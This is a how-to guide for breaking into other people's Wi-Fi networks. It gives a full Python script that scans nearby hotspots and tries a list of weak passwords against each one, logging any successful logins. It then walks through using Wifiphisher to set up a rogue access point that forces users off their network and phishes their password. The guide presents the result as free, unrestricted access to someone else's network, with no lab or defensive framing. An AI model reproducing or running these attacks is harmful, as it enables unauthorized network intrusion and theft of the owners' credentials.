How to Crack Wi‑Fi Passwords with Python: Step‑by‑Step Guide

Wi‑Fi Cracking with Python – Method 1

Prepare the environment by installing Python 2.7, the pywifi module, a password dictionary, and clearing any existing Wi‑Fi connection records.

Import Modules

The script uses only three modules:

from pywifi import *
import time
import sys

Dictionary Preparation

A small list of common weak passwords (TOP 10) is used, for example:

12345678
123456789
88888888
1234567890
00000000
87654321
66668888
11223344
147258369
11111111

Configure Scanner

Scanning is set to run for about 15‑20 seconds per cycle; longer scans provide little additional benefit.

def main():
    scantimes = 3
    testtimes = 15
    output = sys.stdout
    files = "TestRes.txt"
    keys = open(sys.argv[1], "r").readlines()
    print "|KEYS %s" % (len(keys))
    wifi = PyWiFi()
    iface = wifi.interfaces()[0]
    scanres = scans(iface, scantimes)
    nums = len(scanres)
    print "|SCAN GET %s" % (nums)
    # header line omitted for brevity
    for i, x in enumerate(scanres):
        res = test(nums-i, iface, x, keys, output, testtimes)
        if res:
            open(files, "a").write(res)

Scanning Nearby Hotspots

def scans(face, timeout):
    # start scanning
    face.scan()
    time.sleep(timeout)
    # retrieve results after timeout
    return face.scan_results()

Hotspot Testing

def test(i, face, x, key, stu, ts):
    showID = x.bssid if len(x.ssid) > len(x.bssid) else x.ssid
    for n, k in enumerate(key):
        x.key = k.strip()
        face.remove_all_network_profiles()
        face.connect(face.add_network_profile(x))
        code = 10
        t1 = time.time()
        while code != 0:
            time.sleep(0.1)
            code = face.status()
            now = time.time() - t1
            if now > ts:
                break
            stu.write("\r%-*s| %-*s| %s |%*.2fs| %-*s |  %-*s %*s" %
                      (6, i, 18, showID, code, 5, now, 7, x.signal, 10, len(key)-n, k.replace("
", "")))
            stu.flush()
            if code == 4:
                face.disconnect()
                return "%-*s| %s | %*s |%*s
" % (20, x.ssid, x.bssid, 3, x.signal, 15, k)
    return False

The test run shows that 11 weak passwords were tried against 20 detected hotspots, and successful attempts are logged with fields such as WIFIID, SSID/BSSID, connection status, time spent, signal strength, password index, and the password itself.

Wi‑Fi Cracking with Python – Method 2 (Wifiphisher)

This approach uses the Wifiphisher tool to create a rogue access point that tricks users into re‑entering their Wi‑Fi password.

Main Principle

Create a fake AP with the same SSID as the target.

Force the legitimate user’s device to disconnect and request a password update.

Capture the entered password via the rogue AP.

Step 1 – Download Wifiphisher

The source code can be obtained from the official repository; the image below shows the extracted files.

Step 2 – Navigate to the Directory

Change to the extracted wifiphisher directory (e.g., /wifiphisherWi‑Fi1.1) where wifiphisher.py resides.

Step 3 – Run the Script

kali> python wifiphisher.py

If this is the first run, the script may prompt to install hostapd; confirm with Y.

After installation, rerun the script. It will start web servers on ports 8080 and 43, then begin scanning for nearby Wi‑Fi networks.

When the target network (e.g., wonderhowto) appears, press Ctrl+C and specify the number of APs to attack (e.g., 12).

The tool will display the interface in use and the SSID of the targeted AP. Once the victim re‑authenticates, the rogue AP captures the password while the user continues browsing normally.

Finally, the captured password is shown in the terminal, allowing you to use the network freely.

With the password in hand, you can now enjoy unrestricted Wi‑Fi access.